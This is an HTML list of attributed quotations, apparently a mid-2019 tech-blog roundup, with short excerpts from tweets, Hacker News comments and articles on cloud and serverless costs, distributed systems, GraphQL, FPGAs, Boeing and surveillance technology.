<li><a href="https://twitter.com/ChristinGorman/status/1137996442214252544">@ChristinGorman</a>: I'm going to spoil it for you because it's so damn important. Microsoft did a scientific study - based on MS Vista code and found that the best predictor of bugs was: ORGANIZATIONAL COMPLEXITY. More people = worse code. More departments = worse code. Higher turnover = worse code.</li>
<li><a href="https://twitter.com/zackkanter/status/1139646211617505280">@zackkanter</a>:&nbsp;Seems that an entire crop of startups from the last few years have been infected with Kubernetes. What a tragic tax on productivity and distraction from customer value.</li>
<li><a href="https://www.edge.org/conversation/timothy_taylor-polythetics-and-the-boeing-737-max">Timothy Taylor</a>: In reverse isochrestism, a new function is desired, but a familiar form is thought to be needed, perhaps to support the impression that no change of name is needed, and no novel threat exists. This is rather like skeuomorphism, the phenomenon that describes what happens when a new material supplants an old one and both nostalgia and familiar expectation modify the new one in favour of the old </li>
<li><a href="https://news.ycombinator.com/item?id=20314674">55873445216111</a>:&nbsp;Semiconductor fabs require MASSIVE amounts of electric power. In fact, to the first approximation, 5-10% of the cost of a silicon wafer is purely the cost of the electricity consumption. Source: worked in finance dept managing fab spend</li>
<li><a href="https://twitter.com/davatron5000/status/1141369042521006080">@davatron5000</a>: The 2 hardest problems in programming are: 1. Let's not invest time and money in the new thing. 2. Let's not invest time and money in the old thing because a new thing is coming.</li>
<li><a href="https://www.pcmag.com/Fastest-Mobile-Networks">Sascha Segan</a>: Verizon had a good run for the past five years with its nationwide LTE network, but AT&amp;T has rocketed into the top spot this year. What the carrier calls 5G Evolution may not be 5G, but it's definitely a stride toward it. The big push to improve its 4G LTE network in preparation for 5G pays off big time for AT&amp;T; it's America's fastest mobile network in 2019.</li>
<li><a href="https://twitter.com/JoeEmison/status/1141785545502351360">@JoeEmison</a>:&nbsp;The trajectory we are on drives us more toward single service providers with differentiated services, not back out to least-common-denominator solutions that require us to implement all sorts of scaffolding.</li>
<li><a href="https://twitter.com/ben11kehoe/status/1136332156496564224">@ben11kehoe</a>:&nbsp;<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="6a442a0d180501">[email&#160;protected]</a>_ now talking about how people anthropomorphize Roomba&mdash;people want their Roombas, which they&rsquo;ve named, fixed by customer care rather than receive a brand new replacement one #reMARS</li>
<li><a href="https://www.pcmag.com/news/368417/neal-stephenson-explains-his-vision-of-the-digital-afterlife">Neal Stephenson</a>: I ended up having a pretty dark view of [the internet], as you can kind of tell from the book. I saw someone recently describe social media in its current state as a doomsday machine, and I think that's not far off. We've turned over our perception of what's real to algorithmically driven systems that are designed not to have humans in the loop, because if humans are in the loop they're not scalable and if they're not scalable they can't make tons and tons of money.</li>
<li><a href="https://twitter.com/timbray/status/1136304569296740353">@timbray</a>:&nbsp;This group did a Java vs #Golang bake-off for a high-TPS microservice: &ldquo;Java was slower, but tracking reasonably well until about ~P98. &nbsp;Then it started to diverge by a good margin. &nbsp;By P99.9 it was really bad.&rdquo;</li>
<li><a href="https://twitter.com/Dominos_AU/status/1132797029803937792">@Dominos_AU</a>:&nbsp;Our #1 customer complaint is &ldquo;My pizza doesn&rsquo;t look like it should!". So, we introduced DOM Pizza Checker - world-first technology which is set to drastically improve product quality and consistency throughout all Domino&rsquo;s stores in Australia and New Zealand!</li>
<li><a href="https://twitter.com/badnetworker/status/1133363823728091136">@badnetworker</a>: 1999: there are millions of websites all hyperlinked together &nbsp;2019: there are four websites, each filled with screenshots of the other three.</li>
<li><a href="https://twitter.com/pbailis/status/1134306430830272514">@pbailis</a>:&nbsp;DAWNBench entries continue to heat up &ndash; a recent favorite: Baidu trained CIFAR-10 to 94% accuracy for $0.02 on their public cloud&nbsp;</li>
<li><a href="https://www.reddit.com/r/aws/comments/bv70k8/aurora_postgres_disastrous_experience/">Tomdarkness</a>: So we made the terrible decision of migrating to Aurora Postgres from standard RDS Postgres almost a year ago and I thought I'd share our experiences and lack of support from AWS to hopefully prevent anyone experiencing this problem in the future.</li>
<li><a href="https://twitter.com/mjpt777/status/1133102992675299328">@mjpt777</a>:&nbsp;After years of working on distributed systems I still keep being surprised by how easy it is miss potential outcomes. The state space is too vast for the human brain.</li>
<li><a href="https://twitter.com/colmmacc/status/1133409980734828546">@colmmacc</a>:&nbsp;I think it was maybe 3 months between deciding we needed sites and actually having everything signed and ordered, and another 6 weeks before hardware would come and the space actually be usable. This was really really fast and involved me pestering a lot of people.</li>
<li><a href="https://twitter.com/tacertain/status/1136146488554164224">@tacertain</a>: I was the lead engineer on EBS for its first four years, so maybe I am hypersensitive to correlated hard drive failure. However, in my home setup, I bought two drives from each of two manufacturers. After a while, I discovered that monitoring hadn't been set up correctly</li>
<li><a href="https://www.youtube.com/watch?v=RYVdDJ1cFrM">Venki Ramakrishnan</a>~ You have to see something to understand it. That's a thread through history. Being able to see the next level of detail transforms fields. Structure determines function.&nbsp;</li>
<li><a href="https://www.edge.org/conversation/freeman_dyson-the-brain-is-full-of-maps">Freemon Dyson</a>:&nbsp;Brains use maps to process information. Information from the retina goes to several areas of the brain where the picture seen by the eye is converted into maps of various kinds. Information from sensory nerves in the skin goes to areas where the information is converted into maps of the body. The brain is full of maps. And a big part of the activity is transferring information from one map to another.</li>
<li><a href="https://twitter.com/BloombergNEF/status/1133307326562263041">@BloombergNEF</a>:&nbsp;#EVO2019: "Battery prices will continue to fall. As a result, we expect price parity between EVs and internal combustion vehicles (ICE) by the mid-2020s in most segments, though there is wide variation between geographies and vehicle segments."</li>
<li><a href="https://twitter.com/ajaynairthinks/status/1138532803048398848">@ajaynairthinks</a>:&nbsp;As an industry we should really be using the terms &ldquo;monoservice&rdquo; or &ldquo;polyservice&rdquo; depending on whether a service does one thing or many. &ldquo;#microservice&rdquo; implies size/complexity has something to do with purpose, which it doesn&rsquo;t. &nbsp;Huge fan of mono services btw.</li>
<li><a href="https://medium.com/netflix-techblog/predictive-cpu-isolation-of-containers-at-netflix-91f014d856c7">Netflix</a>:&nbsp;Resource allocation problems can be efficiently solved through a branch of mathematics called combinatorial optimization, used for example for airline scheduling or logistics problems.</li>
<li><a href="https://theburningmonk.com/2019/01/you-are-thinking-about-serverless-costs-all-wrong/">Yan Cui</a>: At Yubl, as we migrated most of our services to serverless, we were able to disband the DevOps team. The developers were more than capable of taking on the remaining ops responsibilities. As the paper discussed, the pay-per-invocation model doesn&rsquo;t fit some workloads. In these cases, you can end up paying a lot more with Lambda than with containers or VMs. However, when you calculate the true cost of a solution, you need to factor in the cost of engineers you need to support the solution. At the risk of generalising, I would wager that for 90% of companies, the balance is heavily tipped towards the cost of engineers.</li>
<li><a href="https://tools.ietf.org/html/draft-iab-protocol-maintenance-03">M. Thomson</a>: Time and experience shows that negative consequences to interoperability accumulate over time if an implementations apply the robustness principle. &nbsp;This problem originates from an assumption implicit in the principle that it is not possible to affect change in a system the size of the Internet. &nbsp;That is, the idea that once a protocol specification is published, changes that might require existing implementations to change are not feasible.</li>
<li><a href="https://twitter.com/jeremy_daly/status/1137002244157710336">@jeremy_daly</a>: I've been spending a lot of time lately with @dynamodb in my #serverless applications, so I thought I'd share my surefire guide to migrating to it from #RDBMS. So here is&hellip; How to switch from RDBMS to #DynamoDB in *20* easy steps&hellip; (a thread).&nbsp;STEP 1: Accept the fact that http://Amazon.com &nbsp;can fit 90% of their retail site/system&rsquo;s workloads into DynamoDB, so you probably can too.</li>
<li><a href="https://twitter.com/mattklein123/status/1142905760378249223">@mattklein123</a>:&nbsp;Our industry tends to fetishize the technical architectures of companies like Google, Netflix, etc. They have built some impressive tech to solve rare scaling issues, so this is not surprising. However, does your company/system need similar solutions? Probably not...</li>
<li><a href="https://news.ycombinator.com/item?id=20301463">crehn</a>: Nothing bad with SSH per se, but building your infrastructure in a way that makes ad-hoc remote changes unnecessary is something to strive for. For anything but small deployments, automation, immutability and reproducibility will keep you sane. Less moving parts, things don&rsquo;t suddenly change, easy to audit, easy to rollback, etc.</li>
<li><a href="https://twitter.com/tacertain/status/1132391299733000193">@tacertain</a>: If you're wondering what "P-four-nines" means, it's the latency at the 99.99th percentile, meaning only one in 10,000 requests has a worse latency. Why do we measure latency in percentiles? A thread about how how it came to be at Amazon...In 2001, I was managing the Performance Engineering team. We were responsible for the performance of the website, and we were frustrated. We were a few engineers fighting against the performance entropy of hundreds of developers adding features to the web site.&nbsp;Latency kept going up, but we had a big problem: how to convince people to care. The feature teams had web labs that could show "if we add feature X to the page, we get Y more revenue."&nbsp;If that feature added 100ms to page latency and our only counter was "but latency is bad," our argument didn't carry the day. So we had to figure out how to make our argument stronger.</li>
<li><a href="https://twitter.com/emileifrem/status/1067789758401662976">@emileifrem</a>:&nbsp;Adobe used 125 MongoDB servers to run their activity feed. It was replaced by 48 Cassandra servers. Now it runs on 3 (THREE!) servers of Neo4j. With more data (yet smaller disk footprint), higher load and more functionality. The scalability of a native graph database. 💪💪💪</li>
<li><a href="https://twitter.com/postwait/status/1136431368857165827">@postwait</a>: For the last time, there is a nearly 100% chance that the clever solution that you've thought about for one day or one week or even one month is not as good as the approach of a grad student that has rigorously analyzed it for 3 years. Use their work, I'm tired of your crap.</li>
<li><a href="https://twitter.com/ericlaw/status/1141372208226492422">@ericlaw</a>: "There are always exactly two systems: The deprecated one that no one should use any more, and the new one that isn't ready yet."</li>
<li><a href="https://twitter.com/Jake_Bernstein/status/1131623342719602690">@Jake_Bernstein</a>:&nbsp;In 2018 the number of people &nbsp;in the world older than 64 years old surpassed the number of children under 5 years old. This was the first time in history this was the case.</li>
<li><a href="https://twitter.com/colmmacc/status/1131382621487767555">@colmmacc</a>:&nbsp;"Error budgets" are the god-damn worst idea I've heard of in recent years. SLAs should be realistic goals about what we can achieve with our current techniques and tools, not permission to fail a certain amount.</li>
<li><a href="https://onezero.medium.com/the-dark-forest-theory-of-the-internet-7dc3e68a7cb1">Yancey Strickler</a>: The web 2.0 era has been replaced by a new &ldquo;Web&sup2;&rdquo; era. An age where we simultaneously live in many different internets, whose numbers increase hourly. The dark forests are growing.</li>
<li><a href="https://news.ycombinator.com/item?id=19887028">groby_b</a>: It's depressing the term has become that. "Strong opinion" used to mean "I've looked at the arguments and the counterarguments closely, and I've developed the arguments to the point where I'm convinced this is the right answer". Not "I shout the loudest about it". And "weakly held" meant "I am willing to believe there's data out there showing I'm wrong, and I will look at any new data with an open mind". Not "I'll flip if somebody shouts louder".</li>
<li><a href="https://twitter.com/_jayphelps/status/1136485110344290305">@_jayphelps</a>: Nurses interviewing for a job first are asked to draw the molecular structure of various medications, then usually they&rsquo;ll have them start an IV but require that it isn&rsquo;t done on the arms or legs. Lastly, they usually wrap up with brain surgery. None of this is true, I&rsquo;m told.</li>
<li><a href="https://twitter.com/danilop/status/1139196737044799488">@danilop</a>~&nbsp;An example of using Lambda functions for data processing at scale - 259 TB of uncompressed data processed in just under 20 minutes. The total cost of this run was $162 or about $0.63 per raw terabyte of data processed ($2.7 per compressed terabyte).</li>
<li><a href="https://www.theregister.co.uk/2019/06/20/supercomputer_aws/">Dr Paul Calleja</a>: The cost of running off-prem is significantly higher than the cost of running on-prem. With our cost models it's roughly 3x which is a big number when you are talking petascale.</li>
<li><a href="https://news.ycombinator.com/item?id=20256274">nonlinearzone</a>: I have designed ASICs and FPGAs for nearly 30 years, and seen the evolution of this technology first hand. To say that FPGAs have the wrong abstraction is to not understand what an FPGA is and what is intended to accomplish. Transistors are abstracted into logic gates. Logic gates are abstracted into higher-order digital functions like flip-flops, muxes, etc. It is the mapping of algorithms/functions onto gates that is the essence of digital design. This is difficult work that would be impossible at today's scales (5-billion+ transistors) without synthesis tools and HDLs. And, given that an ASIC mask set costs 1MM+ for a modern geometry, it needs to be done right the first time (or at least the 2nd). Furthermore, the mapping to gates needs to be efficient, throwing more gates at a problem increases area, heat, and power, all of which need to be minimized in most contexts.</li>
<li><a href="https://www.ziprecruiter.com/blog/future-of-work-report-2019/">Ziprecruiter</a>:&nbsp;AI created three times as many jobs as it destroyed in 2018.&nbsp;</li>
<li><a href="https://twitter.com/nicoemoe/status/1141889129308811264">@nicoemoe</a>:&nbsp;One driver asked to talk with a manager and was refused. As he was pleading his case, 4000+ rides, he was actually told by the Uber employee behind the desk, "There's over 100,000 other drivers out there. You're one less. Nothing I can do." /2</li>
<li><a href="https://thememoryguy.com/intels-optane-dimm-price-model/">Memory Guy</a>:&nbsp;Intel&rsquo;s Optane has the opposite problem. &nbsp;Optane&rsquo;s price, half that of DRAM, means that it is priced to market &mdash; that&rsquo;s the price that it can sell for. &nbsp;Since it currently costs more than DRAM to produce Intel has to sell it at a loss. &nbsp;</li>
<li><a href="https://news.ycombinator.com/item?id=20252511">millstone</a>: Exactly right. Microsoft was profoundly ahead of the curve! They were pushing their tablet/slate stuff 5+ years before the iPhone and iPad. Their key mistake was attempting to leverage Windows, which forced an awkward stylus mode driving a shoehorned desktop OS. Apple blindsided them with a better cellphone instead of a worse computer, and so it slotted in naturally. Microsoft could only conceive of Windows devices. Apple's big idea was to not make the iPhone a Mac. If anything, they overcorrected, dragged kicking and screaming into allowing apps at all.</li>
<li><a href="https://twitter.com/jwz/status/1130921170969276417">@jwz</a>:&nbsp;Surge Hacking. Uber, Lyft drivers causing artificial price surges: Every night, several times a night, Uber and Lyft drivers at Reagan National Airport simultaneously turn off their ride share apps for a minute or two to trick the app into thinking...</li>
<li><a href="https://news.ycombinator.com/item?id=20256274">nonlinearzone</a>: FPGAs grew out of PLD/CPLDs and allowed a significantly higher level of integration and board area reduction. They offered a way to reduce the cost of a system without requiring the investment and expertise required for an ASIC. But, FPGAs themselves are an ASIC, implemented with the same technology as any other ASIC. So, FPGAs are a compromise; the LUTs, routing, etc are all a mechanism to make a programmable ASIC. Compared to an ASIC, however, FPGAs require more power and can implement less capability for a given die size. But, they allow a faster and lower cost development cycle. To bring this back around, the LUTs and routing mechanisms are functions that have been mapped to gates. To use an FPGA, algorithms still need to be mapped onto the LUTs and this is largely the same process as mapping to gates.&nbsp;The best FPGA/ASIC abstraction we have today is a CPU/GPU.</li>
<li><a href="https://twitter.com/cloud_opinion/status/1141438022388527104">@cloud_opinion</a>: Oracle quarter results: Cloud Services and License Support revenues were $6.8 billion. While you guys were fighting over definition of Cloud, Cloudless, Serverless etc etc.&nbsp;This is also why AWS top execs are increasingly obsessed about Oracle - they know that Oracle sales reps are standing between them and customer.</li>
<li><a href="https://news.ycombinator.com/item?id=20204645">runeks</a>: The reason for Bitcoin&rsquo;s design is precisely because a centralized/pegged alternative was tried and failed: https://en.m.wikipedia.org/wiki/Ecash. Facebook&rsquo;s currency is not a successor of Bitcoin, it&rsquo;s an inferior reincarnation of a failed predecessor.</li>
<li><a href="https://news.ycombinator.com/item?id=20262142">ckastner</a>: this current trend of of "disrupting" the market by flouting or circumventing regulations may have worked for Uber, AirBnB and so on, but Libra might just be a step too bold. Unless Libra aims to uphold the same regulations that banks must, then at some point, I predict that there is a huge amount of trouble coming for them. Financial services can be both used and abused, and regulators have forced banks to address the abuse (eg: AML/KYC practices) to protect participants. Circumventing these regulations is equivalent to rolling back these protections.</li>
<li><a href="https://www.bloomberg.com/news/articles/2019-06-28/boeing-s-737-max-software-outsourced-to-9-an-hour-engineers">Peter Robison</a>: Rabin, the former software engineer, recalled one manager saying at an all-hands meeting that Boeing didn&rsquo;t need senior engineers because its products were mature.</li>
<li><a href="https://twitter.com/kellabyte/status/1146308488945184768">@kellabyte</a>:&nbsp;I miss all the distributed systems debates from Boundary and Riak folks. Ever since both died the discussions have really dropped off in the community.</li>
<li><a href="https://news.ycombinator.com/item?id=20457256">andygrove</a>: This is for people who want to live in a future where we use efficient and safe system level languages for massively scalable distributed data processing. IMHO, Python and Java are not ideal language choices for these purposes. Rust offers much lower TCO compared to current industry best practices in this area.</li>
<li><a href="https://www.forbes.com/sites/nicolemartin1/2019/06/27/13-greatest-quotes-about-the-future-of-artificial-intelligence/#4118b2763bdf">Sam Altman</a>:&nbsp;AI will probably most likely lead to the end of the world, but in the meantime, there'll be great companies.</li>
<li><a href="https://thenewstack.io/openfaas-creator-on-open-sources-community-funding-model/">Alex Ellis</a>: With serverless 2.0, &ldquo;you can run any code, whether binary or an HTTP server, any way you like &mdash; your laptop, on-premises, on OpenShift, in the cloud,&rdquo; Ellis said. Kubernetes provides a common substrate.</li>
<li><a href="https://www.potaroo.net/ispcol/2019-06/bgp30.html">Geoff Huston</a>: It may well be that BGP will now last for as long as the Internet will last.</li>
<li><a href="https://twitter.com/rdonoghue/status/1144011630197522432">@rdonoghue</a>: Reminded that the Microsoft ebook store closes next week. &nbsp;The DRM'd books will stop working. I cannot believe that sentence. "The books will stop working." I keep saying it and it sounds worse each time.</li>
<li><a href="https://www.potaroo.net/ispcol/2019-06/dedr.html">Geoff Huston</a>: Why has DNSSEC evidently failed? Was this a protocol failure or a failure of the business model of name resolution? The IETF's engagement with security has been variable to poor, and the failure to take a consistent stance with the architectural issues of security has been a key failure here. But perhaps this is asking too much of the IETF.</li>
<li><a href="https://twitter.com/dhh/status/1149304757804314624">DHH</a>:&nbsp;I suppose an ad like that is likely to attract people who are just as delusional as the authors of this job posting: "Of course I'm a 10x engineer willing to work for half the pay of a senior Valley engineer, because I'm going to make it up on these startup options!!".</li>
<li><a href="https://ferd.ca/ten-years-of-erlang.html">Fred T-H</a>: Communities tend to move in waves. Since hype phases can increase the size of a community tenfold or a hundredfold for a while, and that most people will take a curious look and then leave, most users in a community will tend to sit at the first rung and rarely make it past there. A fraction will make it a level above, and an ever shrinking fraction will make it above that one, and so on, until you have inner circles of experts at the highest levels.</li>
<li><a href="https://twitter.com/mjpt777/status/1146851993161543683">@mjpt777</a>:&nbsp;Non-volatile memory coming shortly with &lt;100ns read and &lt;300ns write plus byte addressable :-)</li>
<li><a href="https://twitter.com/mweagle/status/1145904507492036613">@mweagle</a>: All teams are cognitively distributed. Some teams are geographically co-located.</li>
<li><a href="https://news.ycombinator.com/item?id=20341884">jimmytucson</a>: The quintessential insight from Moneyball was that walks were undervalued at the time. Now, thanks to a combination of camera tracking and radar, we know the exact location of every player and the ball at every millisecond of the game. This has given rise to a new, hyper-optimized style of play that can&rsquo;t be replicated at other levels (minor leagues down to college, high school, and little league) due to the technology and analytical skills needed to harness this information. It&rsquo;s starting to become clear that the optimizations slightly favor pitching and defense more than hitting, which some argue leads to a boring, &ldquo;3 true outcomes&rdquo; style of play.</li>
<li><a href="https://arxiv.org/abs/1907.00172">John L&aring;ng</a>: With DIVINE, defects were found in parts of the code base that had already been subject to hundreds of hours of unit tests, integration tests, and acceptance tests. Most importantly, model checking was found to be easy to integrate into the workflow of the software project and bring added value, not only as verification, but also validation methodology. Therefore, using model checking for developing library-level code seems realistic and worth the effort.</li>
<li><a href="https://news.ycombinator.com/item?id=20370465">superpermutat0r</a>: Hashed probably means that some features are mapped to a desired perceptron weight via a hash function. This serves as an implicit regularization and can be much more efficient (no need for a predetermined feature vector, sparse representation etc.). It's called hash trick in ML. Perceptron is a single layer NN. Dynamic predictor, a branch predictor that adapts to program input, not just some predetermined state (like a formula that was shown to be good enough for a collection of programs).&nbsp;</li>
<li><a href="https://longreads.com/2019/06/21/nothing-kept-me-up-at-night-the-way-the-gorgon-stare-did/">Holland Michel</a>:<strong> So what is Gorgon Stare and WAMI technology, how does it work?</strong>&nbsp;What Wide Area Motion Imagery does is expand the aperture. You can watch an entire city at once and zoom in on any one part of the imagery with a decent amount of detail, while still recording everything else. To do that is a tremendous technological leap, because you need an incredibly powerful camera. And that&rsquo;s the other thing that sets them apart. They are tremendously powerful.&nbsp;It&rsquo;s a way of seeing everybody all the time. Fundamental to liberal democracy is the ability to have sacrosanct private spaces. That is where the life of civil society exists. It is where our own personal lives exist, where we are able to pursue our dreams and passions. And it is often where we hold power to account. When you uncover those spaces, you fundamentally put all of those things at risk.</li>
<li><a href="https://news.ycombinator.com/item?id=20358023">desc</a>: I can see absolutely no positive value whatsoever in GraphQL for internal APIs. You're basically saying 'please, formulate any query you like, and I will waste years of my life trying to optimise that general case'. Seriously. For internal stuff you want to be as specific as humanly possible. You want to optimise the living f*ck out of that hot path thousand-times-a-second query, and build an entirely separate service to handle that particular URL if necessary.</li>
<li><a href="https://twitter.com/stuarthalloway/status/1134806008528809985">@stuarthalloway</a>:&nbsp;If you don't think managing state is tricky, consider the fact that 80% of all problems in all complex systems are fixed by rebooting.</li>
<li><a href="https://twitter.com/adrianco/status/1135796139670687744">@adrianco</a>:&nbsp;Information on the weekend&rsquo;s Google outage. It was an incorrectly scoped config change compounded by inability to observe and operate systems in a degraded state. https://cloud.google.com/blog/topics/inside-google-cloud/an-update-on-sundays-service-disruption &hellip; - I blogged about needing independent monitoring last year</li>
<li><a href="https://medium.com/swlh/inside-the-failure-of-a-startup-b4a123c962bb">James Beswick</a>:&nbsp;&ldquo;Security products are impossible to sell,&rdquo; said a seasoned software veteran who had worked for two large security startups. &ldquo;People won&rsquo;t pay for it, they don&rsquo;t understand the problem and never think they&rsquo;ll get hacked. It&rsquo;s impossible.&rdquo; His short 10-second explanation mirrored everything we had seen.</li>
<li><a href="https://longreads.com/2019/06/21/nothing-kept-me-up-at-night-the-way-the-gorgon-stare-did/">Holland Michel</a>: Get this: Amazon has a patent for a system to analyze the video footage of private properties collected by its delivery drones and then feed that analysis into its product recommendation algorithm. You order an iPad case, a drone comes to your home and delivers it. While delivering this package the drone&rsquo;s computer vision system picks up that the trees in your backyard look unhealthy, which is fed into the system, and then you get a recommendation for tree fertilizer. There is tremendous value in the data that can be collected from the sky and people will seek to take advantage of that data.</li>
<li><a href="https://www.allthingsdistributed.com/2019/06/proving-security-at-scale-with-automated-reasoning.html">Werner Vogels</a>: With previous tools, auditors could not evaluate all of the code in all possible configurations, nor could they evaluate instances where keys were being used. With automated reasoning, customers can use a proof to examine the entire system for a certain value to gain insight into their environments. This creates a higher standard for security beyond today's advanced control measures, such as automated controls, preventive controls, or detective controls.</li>
<li><a href="https://www.edge.org/conversation/barbara_tversky-the-geometry-of-thought">Barbara Tversky</a>: place cells, single cells in the hippocampus that code places in the world, and grid cells next door one synapse away in the entorhinal cortex that map the place cells topographically on a neural grid. If it&rsquo;s in the brain, it must be real. Even more remarkably, it turns out that place cells code events and ideas and that temporal and social and conceptual relations are mapped onto grid cells. Voila: spatial thinking is the foundation of thought. Not the entire edifice, but the foundation.</li>
<li><a href="https://news.ycombinator.com/item?id=20358884">damnyou</a>: GraphQL is bad for public APIs. It is good for precisely one thing: when the server and the client are controlled by the same entity, making updates to clients without having to add new internal APIs to the server. But this one thing is so useful for almost everyone that for internal APIs using GraphQL is usually a no-brainer. You actually don't want to be as performant as possible for internal APIs. There is a performance-flexibility trade-off involved and GraphQL lets you choose a different point on the Pareto frontier than maximum performance.</li>
<li><a href="http://www.odbms.org/blog/2019/05/on-databases-and-non-volatile-memory-technologies-interview-with-joy-arulraj-and-andrew-pavlo/">Arulraj, Pavlo</a>:&nbsp;NVM upends the key design assumption underlying the WAL protocol since it supports fast random writes. Thus, we need to tailor the protocol for NVM. We designed such a protocol that we call write-behind logging (WBL). WBL not only improves the runtime performance of the DBMS, but it also enables it to recovery nearly instantaneously from failures. The way that WBL achieves this is by tracking what parts of the database have changed rather than how it was changed.</li>
<li><a href="https://news.ycombinator.com/item?id=20359986">Horusiath</a>:&nbsp;AFAIK Facebook created GraphQL specifically for their gateway API - a service used as a facade between internal service mes(s/h) and their client - not for internal ones themselves. That's why things like schema stitching didn't came from FB - they weren't using it in that context.</li>
<li><a href="https://stripe.com/rcas/2019-07-10">Stripe</a>: Stripe splits data by kind into different database clusters and by quantity into different shards. Each cluster has many shards, and each shard has multiple redundant nodes. We routinely exercise node failover logic during upgrades, maintenance, and failures.</li>
<li><a href="https://twitter.com/timverheyden/status/1148975373855666176">@timverheyden</a>:&nbsp;Like Amazon, Google employees are eavesdropping I discovered with my team. Confirmed by 3 sources and Google. One transcriber speaks out.&nbsp;</li>
<li><a href="https://news.ycombinator.com/item?id=20469551">makomk</a>: The status bit that was set is supposed to mean "working without guarantee" - that is, the satellite may not meet the normal minimum performance level but is still in service. This specific combination of status bits corresponds to a status of "marginal", between full health and actually out of service. In order to actually mark the satellites as fully out of service they'd need to either replace the navigation data with dummy values or upload new navigation data with some additional status bits set</li>
<li><a href="https://news.ycombinator.com/item?id=20366267">ChuckMcM</a>:&nbsp;It reminds me of the adage "Workplace culture is what you do not what you say you do." I have met too many engineering managers over the years who thought they could cleverly have it both ways by exhorting quality is the highest priority while penalizing or criticizing engineers who objected based on quality or design metrics.</li>
<li><a href="https://www.seattletimes.com/opinion/what-will-it-be-boeing-great-airplanes-that-generate-cash-flow-or-great-cash-flow-period/">Stan Sorscher</a>: According to Boeing&rsquo;s annual reports, in the last five years Boeing diverted 92% of operating cash flow to dividends and share buybacks to benefit investors. Since 1998, share buybacks have consumed $70 billion, adjusted for inflation. That could have financed several entire new airplane models, with money left over for handsome executive bonuses.</li>
<li><a href="https://news.ycombinator.com/item?id=20366283">a3n</a>: I worked at Boeing from '88 to '94, writing test software. I liked it. I liked the people and the atmosphere. I always thought that when Boeing moved its headquarters from Seattle to Chicago that that was the end of something special. They went from being legendary Boeing to just another hyper-corporation who happens to make money doing X or Y or Z. In my opinion.</li>
<li><a href="https://www.newscientist.com/article/2208439-data-can-now-be-stored-inside-the-molecules-that-power-our-metabolism/">Ruby Prosser Scully</a>: DNA isn&rsquo;t the only molecule we could use for digital storage. It turns out that solutions containing sugars, amino acids and other small molecules could replace hard drives too.</li>
<li><a href="https://medium.com/darklang/how-dark-deploys-code-in-50ms-771c6dd60671">Paul Biggar</a>: Speed of developer iteration is the single most important factor in how quickly a technology company can move.&nbsp;So far, the technology Rosenstein and his colleagues created is slow compared with electronic computers. However, it does have some advantages over DNA memory.</li>
<li><a href="https://news.ycombinator.com/item?id=20411940">asdfokd8</a>: It seems to me like Aggregators vs Platforms is related to Products as Commodities vs Products as Brands. Aggregators win when products are anonymous commodities. Brands win when products are beloved. It seems like the trend (for many reasons: over-marketing, dis-satisfaction, dis-trust, a race toward the barely-legal) is toward products as brands: brands which are authentic and relational and participants themselves in the experience (that "get it").</li>
<li><a href="https://news.ycombinator.com/item?id=20459585">snek</a>: The thing I'm most excited about right now is WASI. It provides abstractions for system calls like fs, sockets, graphics, etc. But the best part is that the entire API is being designed with security and capabilities in mind. WASM binaries have to explicitly declare resources they want access to, or risk not being allowed to access them. (The application could also choose to further prompt the user, but i think in most cases they will just be denied). Once resources are acquired, we use unforgable handles to refer to them. It is a super cool and declarative way to make sure people know exactly what a wasm bin will try to access before it's even run.</li>
<li><a href="https://www.youtube.com/watch?v=0fLvCezGMko">Pete Warden</a>~ There are over 250 billion embedded devices active in the world, and the number shipped is growing by 20% every year. They are gathering massive amounts of sensor data, far more than can ever be transmitted or processed in the cloud.&nbsp;Deep learning can run on a coin battery for a year.</li>
<li><a href="https://news.ycombinator.com/item?id=20337924">ken</a>:&nbsp;In other words, everyone from users to developers comes to depend on the status quo. The softness of software is a benefit during initial development, but mostly just a liability later. We value the status quo even more than quality.</li>
<li><a href="https://twitter.com/copyconstruct/status/1147630968947109888">@copyconstruct</a>:&nbsp;One of the things we did really well at my previous job was dark traffic testing on newly *deployed* (not released) code. So we could capture production traffic and replay it in the exact same prod environment but against the newly *deployed* service.</li>
<li><a href="https://www.eetimes.com/document.asp?doc_id=1334918">Evgeni Gousev</a>: There is a lot of talk about cloud ML, while ML at the smartphone level becomes more and more sophisticated. But if you look at the data, 90 percent of the data is in the real world. How do you connect all these cameras, IMUs, and other sensors and do ML at that level? Tiny ML is going to be big, and there is a real, urgent need to drive the whole ecosystem of tiny ML, including applications, software, tools, algorithms, hardware, ASICs, devices, fabs, and everything else.</li>
<li><a href="https://www.eetimes.com/document.asp?doc_id=1334918">Sally Ward-Foxton</a>: A variety of techniques are used to keep power consumption down. This includes parallelisation, though not to speed things up; 8 cores are used to allow a slower clock speed, which allows the core voltage to drop, which saves energy (in practice, the clock frequency is adjusted dynamically, depending on workload)</li>
<li><a href="https://news.ycombinator.com/item?id=20370767">orblumesea</a>: tl;dr, US govt dysfunction is largely responsible for the lack of innovation in the area, as the military "owns" the prime 5g wireless spectrum. No US competitor exists because there's no competitive market that is allowed to exist.</li>
<li><a href="https://www.zdnet.com/article/petaflop-systems-dominate-supercomputer-landscape/">Charlie Osborne</a>:&nbsp;Petaflop capabilities now dominate the supercomputer landscape with all of this year's entries in the TOP500 now delivering these levels of performance or more.</li>
<li><a href="https://news.ycombinator.com/item?id=20417266">nisten</a>: I used to hate aws for how expensive their bandwidth and storage was, until I started actually using it last year. I think their new serverless stack is about to leave a lot of devops out of a job. You can setup a a CI/CD pipeline in about half an hour with amplify, at the previous company I remember it taking a good 3 weeks to get CircleCi up and running properly. And then moving a microservice over to it is basically 1 command, a few options, mostly just copy over the config from your old express backend with a few changes, and you're done. It's insane. One other dev I've showed the lighthouse scores of the react stack I deployed on it even said "this should be illegal". And they're right, it's pretty much automated devops, the whole ap now loads in 300ms. If you have server side rendering in your app the static content will automatically be cached on their CDNs.</li>
<li>Me: The best disguise for malice is incompetence.</li>
<li><a href="https://finitestate.io/wp-content/uploads/2019/06/Finite-State-SCA1-Final.pdf">Finite State Supply Chain</a>: Overall, despite Huawei&rsquo;s claims about prioritizing security, the security of their devices appears to lag behind the rest of the industry. Through analysis of firmware changes over time, this study shows that the security posture of these devices is not improving over time &mdash; and in at least one case we observed, it actually decreased. This weak security posture, coupled with a lack of improvement over time, obviously increases security risks associated with use of Huawei devices.</li>
<li><a href="https://news.ycombinator.com/item?id=20412488">pxue</a>: Amazon will win in the long run because at the end of the day it's all about if the "platform" can move merchandize or not. Amazon captures top of the funnel all the way down to personalized targeting. Shopify will never do that. they are just the tool to help you figure out all that yourself.</li>
